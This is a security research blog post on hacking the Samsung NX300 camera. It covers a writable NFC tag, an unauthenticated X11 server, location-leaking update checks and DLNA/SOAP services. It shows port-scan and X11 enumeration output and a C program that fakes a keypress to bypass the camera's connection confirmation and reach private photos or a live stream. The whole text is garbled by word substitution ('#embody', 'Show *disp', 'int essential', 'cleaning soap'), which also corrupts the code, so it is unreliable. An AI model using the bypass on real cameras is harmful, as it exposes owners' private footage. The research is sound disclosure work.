Hacking the Samsung NX300 ‘Good’ Digital camera
Georg Lukas, 2014-05-07 18:45
The Samsung NX300
good digital camera is a middle-class mirrorless digital camera with NFC and WiFi
connectivity. You may join it along with your native WiFi community to add
on to cloud providers, share footage through
DLNA or
get hold of distant entry out of your smartphone. For the latter, the digital camera supplies
the Distant Viewfinder and MobileLink modes the place it creates an
unencrypted entry level with wide-open entry to its X server and any
knowledge which you’d anticipate solely to be obtainable to your smartphone.
As a result of {hardware} engineers suck at software program safety, nothing else was to be
anticipated. Nonetheless, the next will present how badly they suck, if solely
for documentation functions.
This put up is barely masking the community connectivity of the NX300.
Learn the follow-up posts for getting a root shell
and adding features to the camera.
The smartphone app deserves some consideration as properly. Be at liberty to do your personal
analysis and put up it to the
project wiki.
The findings on this weblog posts are primarily based on firmware model 1.31.
NFC Tag
The NFC “connectivity” is an
NTAG203
created by NXP, which is pre-programmed with an NDEF message to obtain and
launch the (horribly designed)
Samsung SMART CAMERA App
from Google Play, and to tell the app in regards to the entry level identify offered
by this particular person digital camera:
Sort: MIME: utility/com.samsungimaging.connectionmanager
Payload: AP_SSC_NX300_0-XX:XX:XX
Sort: EXTERNAL: urn:nfc:ext:android.com:pkg
Payload: com.samsungimaging.connectionmanager
The tag is writable, so a malicious consumer can simply “hack” your digital camera by
rewriting its tag to obtain some evil app, or to open nasty hyperlinks in your
internet browser, merely by touching it with an NFC-enabled smartphone. This was
confirmed by changing the tag content material with an URL.
The deployed tag helps everlasting write-locking, so if a prankster
nerd, you may find yourself with a digital camera caught redirecting you to a hardcore
porn website.
WiFi Networking
You may configure the NX300 to enter your WiFi community, it is going to behave like a
common shopper with some open providers, like DLNA. Allow us to see what precisely is
supplied by performing a port scan:
megavolt:~# nmap -sS -O nx300
Beginning Nmap 6.25 ( http://nmap.org ) at 2013-11-21 22:37 CET
Nmap scan report for nx300.native (192.168.0.147)
Host is up (0.0089s latency).
Not proven: 999 closed ports
PORT STATE SERVICE
6000/tcp open X11
MAC Handle: A0:21:95:**:**:** (Unknown)
No actual OS matches for host (If what OS is operating on it, see http://nmap.org/submit/ ).
This scan was carried out whereas the “E-Mail” utility was open. In AllShare
Play and MobileLink modes, 7676/tcp
is opened as well as. Additional, in
Distant Viewfinder mode, the digital camera additionally opens 7679/tcp
.
X Server
Wait, what? X11 as an open service? Might that be true? For positive it’s
access-locked through TCP to forestall abuse?
georg@megavolt:~$ DISPLAY=nx300:0 xlsfonts
-misc-fixed-medium-r-semicondensed--0-0-75-75-c-0-iso8859-1
-misc-fixed-medium-r-semicondensed--13-100-100-100-c-60-iso8859-1
-misc-fixed-medium-r-semicondensed--13-120-75-75-c-60-iso8859-1
6x13
cursor
mounted
georg@megavolt:~$ DISPLAY=nx300:0 xrandr
Display 0: minimal 320 x 200, present 480 x 800, most 4480 x 4096
LVDS1 linked 480x800+0+0 (regular left inverted proper x axis y axis) 480mm x 800mm
480x800 60.0*+
HDMI1 disconnected (regular left inverted proper x axis y axis)
georg@megavolt:~$ for i in $(xdotool search '.') ; do xdotool getwindowname $i ; accomplished
Defaulting to go looking window identify, class, and classname
Enlightenment Background
acdaemon,key,receiver
Enlightenment Black Zone (0)
Enlightenment Body
di-camera-app-nx300
Enlightenment Body
smart-wifi-app-nx300
Nope! That is actually an unprotected X server! It’s operating
Enlightenment! And we will even run apps on
it! However apart from displaying stuff on the digital camera the enjoyable appears very restricted:
X11 Key Bindings
A brief investigation utilizing xev
outlines that the bodily keys on the
digital camera physique are certain to X11 key occasions as follows:
On/Off | XF86PowerOff (solely when turning off) |
---|---|
Scroll Wheel | XF86ScrollUp / XF86ScrollDown |
Direct Hyperlink | XF86Mail |
Mode Wheel | F1 .. F10 |
Video Rec | XF86WebCam |
+/- | XF86Reload |
Menu | Menu |
Fn | XF86HomePage |
Keypad | KP_Left .. KP_Down, KP_Enter |
Play | XF86Tools |
Delete | KP_Delete |
WiFi Consumer: Firmware Replace Verify
When the digital camera goes on-line, it performs a firmware model verify.
First, it retrieves http://gld.samsungosp.com
:
Request:
GET / HTTP/1.1
Content material-Sort: textual content/xml;charset=utf-8
Settle for: utility/x-shockwave-flash, utility/vnd.ms-excel, */*
Settle for-Language: ko
Person-Agent: Mozilla/4.0
Host: gld.samsungosp.com
Response:
HTTP/1.1 200 OK
Settle for-Ranges: bytes
Content material-Sort: textual content/html
Date: Thu, 28 Nov 2013 16:23:48 GMT
Final-Modified: Mon, 31 Dec 2012 02:23:18 GMT
Server: nginx/0.7.65
Content material-Size: 7
Connection: keep-alive
200 OK
This actually seems like a no-op. However perhaps it is a backdoor to permit
for distant code execution? Who is aware of…
Then, a question to
http://ipv4.connman.net/online/status.html
returns an empty doc, however has your location knowledge (apparently
obtained from the IP) within the headers:
X-ConnMan-Standing: on-line
X-ConnMan-Consumer-IP: ###.###.##.###
X-ConnMan-Consumer-Handle: ###.###.##.###
X-ConnMan-Consumer-Continent: EU
X-ConnMan-Consumer-Nation: DE
X-ConnMan-Consumer-Area: ##
X-ConnMan-Consumer-Metropolis: ###### (my precise metropolis)
X-ConnMan-Consumer-Latitude: ##.166698
X-ConnMan-Consumer-Longitude: ##.666700
X-ConnMan-Consumer-Timezone: Europe/Berlin
Wow! They know the place I stay! At the very least they don’t transmit any distinctive identifiers with the question.
Because the final step, the digital camera is
asking for firmware versions
and will get redirected to an XML doc with the ChangeLog.
Recognized variations thus far:
WiFi Entry Level: UPnP/DLNA
Two of the on-camera apps (MobileLink, Distant Viewfinder) open an
unencrypted entry level named AP_SSC_NX300_0-XX:XX:XX
(the place XX:XX:XX
is the machine a part of its MAC handle). Thankfully, Samsung’s engineers have been
good and added a consumer affirmation dialog to the digital camera UI, to forestall distant
abuse:
Sadly, this dialog is operating on a wide-open X server, so all we’d like
is to faux an KP_Return
occasion (primarily based on an
example by bharathisubramanian),
and we will join with whichever shopper, stream a stay video or obtain all
the non-public footage from the SD card, relying on the enabled mode:
#embody <X11/Xlib.h>
#embody <X11/Intrinsic.h>
#embody <X11/extensions/XTest.h>
#embody <unistd.h>
/* Ship Pretend Key Occasion */
static void SendKey (Show * disp, KeySym keysym, KeySym modsym){
KeyCode keycode = 0, modcode = 0;
keycode = XKeysymToKeycode (disp, keysym);
if (keycode == 0) return;
XTestGrabControl (disp, True);
/* Generate modkey press */
if (modsym != 0) {
modcode = XKeysymToKeycode(disp, modsym);
XTestFakeKeyEvent (disp, modcode, True, 0);
}
/* Generate common key press and launch */
XTestFakeKeyEvent (disp, keycode, True, 0);
XTestFakeKeyEvent (disp, keycode, False, 0);
/* Generate modkey launch */
if (modsym != 0)
XTestFakeKeyEvent (disp, modcode, False, 0);
XSync (disp, False);
XTestGrabControl (disp, False);
}
/* Primary Perform */
int essential (){
Show *disp = XOpenDisplay (NULL);
sleep (1);
/* Ship Return */
SendKey (disp, XK_Return, 0);
}
DLNA Service: Distant Viewfinder
The DLNA service is exposing some digital camera options, that are queried and
utilized by the Android app. The machine’s pleasant identify is [Camera]NX300
,
as will be queried through HTTP from http://nx300:7676/smp_2_
:
<dlna:X_DLNADOC>DMS-1.50</dlna:X_DLNADOC>
<deviceType>urn:schemas-upnp-org:machine:MediaServer:1</deviceType>
<friendlyName>[Camera]NX300</friendlyName>
<producer>Samsung Electronics</producer>
<manufacturerURL>http://www.samsung.com</manufacturerURL>
<modelDescription>Samsung Digital camera DMS</modelDescription>
<modelName>SP1</modelName>
<modelNumber>1.0</modelNumber>
<modelURL>http://www.samsung.com</modelURL>
<serialNumber>20081113 Folderview</serialNumber>
<sec:X_ProductCap>smi,getMediaInfo.sec,getCaptionInfo.sec</sec:X_ProductCap>
<UDN>uuid:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX</UDN>
<serviceList>
<service>
<serviceType>urn:schemas-upnp-org:service:ContentDirectory:1</serviceType>
<serviceId>urn:upnp-org:serviceId:ContentDirectory</serviceId>
<controlURL>/smp_4_</controlURL>
<eventSubURL>/smp_5_</eventSubURL>
<SCPDURL>/smp_3_</SCPDURL>
</service>
<service>
<serviceType>urn:schemas-upnp-org:service:ConnectionManager:1</serviceType>
<serviceId>urn:upnp-org:serviceId:ConnectionManager</serviceId>
<controlURL>/smp_7_</controlURL>
<eventSubURL>/smp_8_</eventSubURL>
<SCPDURL>/smp_6_</SCPDURL>
</service>
</serviceList>
<sec:deviceID>
</sec:deviceID>
</machine>
Extra SOAP providers are offered for altering settings like focus and
flash (/smp_3_
):
Perform | Arguments | Outcome |
---|---|---|
GetSystemUpdateID | Id | |
GetSearchCapabilities | SearchCaps | |
GetSortCapabilities | SortCaps | |
Browse | ObjectID BrowseFlag Filter StartingIndex RequestedCount SortCriteria |
Outcome NumberReturned TotalMatches UpdateID |
GetIP | GETIPRESULT | |
GetInfomation | GETINFORMATIONRESULT StreamUrl | |
SetResolution | RESOLUTION | |
ZoomIN | CURRENTZOOM | |
ZoomOUT | CURRENTZOOM | |
MULTIAF | AFSTATUS | |
AF | AFSTATUS | |
setTouchAFOption | TOUCH_AF_OPTION | SET_OPTION_RESULT |
touchAF | AFPOSITION | TOUCHAF_RESULT |
AFRELEASE | AFRELEASERESULT | |
ReleaseSelfTimer | RELEASETIMER | |
Shot | AFSHOTRESULT | |
ShotWithGPS | GPSINFO | AFSHOTRESULT |
SetLED | LEDTIME | |
SetFlash | FLASHMODE | |
SetStreamQuality | High quality |
One other service is out there for image / video streaming (/smp_4_
):
<?xml model="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/cleaning soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/cleaning soap/encoding/">
<s:Physique>
<u:GetInfomationResponse xmlns:u="urn:schemas-upnp-org:service:ContentDirectory:1">
<GETINFORMATIONRESULT>
<Resolutions>
<Decision><Width>5472</Width><Peak>3648</Peak></Decision>
<Decision><Width>1920</Width><Peak>1080</Peak></Decision>
</Resolutions>
<Flash>
<Helps><Assist>off</Assist><Assist>auto</Assist></Helps>
<Defaultflash>auto</Defaultflash>
</Flash>
<FlashDisplay>
<Helps><Assist>off</Assist><Assist>auto</Assist></Helps>
<CurrentFlashDisplay>off</CurrentFlashDisplay>
</FlashDisplay>
<ZoomInfo>
<DefaultZoom>0</DefaultZoom>
<MaxZoom>1</MaxZoom>
</ZoomInfo>
<AVAILSHOTS>289</AVAILSHOTS>
<ROTATION>1</ROTATION>
<StreamQuality>
<High quality><Possibility>excessive</Possibility><Possibility>low</Possibility></High quality>
<Default>excessive</Default>
</StreamQuality>
</GETINFORMATIONRESULT>
<StreamUrl>
<QualityHighUrl>http://192.168.102.1:7679/livestream.avi</QualityHighUrl>
<QualityLowUrl>http://192.168.102.1:7679/qvga_livestream.avi</QualityLowUrl>
</StreamUrl>
</u:GetInfomationResponse>
</s:Physique>
</s:Envelope>
After triggering the suitable instructions, a stay video stream needs to be obtainable
from http://nx300:7679/livestream.avi
. Nevertheless, a quick try to get
some video with wget or mplayer failed.
The “supply code” package deal offered on
Samsung’s OSS Release Center is 834 MBytes
compressed and primarily incorporates three copies of the rootfs picture (400-500MB
every), after which some scripts. The precise construct root is hidden beneath the second
paper sheet hyperlink within the “Bulletins” column.
Additionally, there are Obamapics in
TIZEN/venture/NX300/picture/rootdir/decide/sd0/DCIM/100PHOTO
.
The venture is constructed on an historical model of
Tizen, on which I’m no skilled. Any individual else
must take these things aside, make a correct construct atmosphere, or port
OpenWRT to it.
Full sequence: